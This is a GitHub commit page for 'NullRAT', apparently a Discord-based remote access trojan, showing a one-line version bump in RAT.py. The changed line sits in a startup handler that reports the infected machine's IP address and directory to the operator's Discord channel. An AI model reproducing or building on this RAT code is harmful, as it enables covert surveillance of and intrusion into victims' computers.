Skip to content

Commit

Permalink
v8.0
Browse files Browse the repository at this point in the history
  • Loading branch information
NullCode1337 authored Apr 27, 2022
1 parent 57f986d commit eff221f
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion NullRAT/RAT.py
Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,7 @@
@client.event
async def on_ready():
await client.get_channel(notification_channel).send(
embed=Embed(title = f"NullRAT v7.5 started on {IP()}\nCurrently present in {original_dir}")
embed=Embed(title = f"NullRAT v8.0 started on {IP()}\nCurrently present in {original_dir}")
)

# Intelligence Gathering #
Expand Down

0 comments on commit eff221f

Please sign in to comment.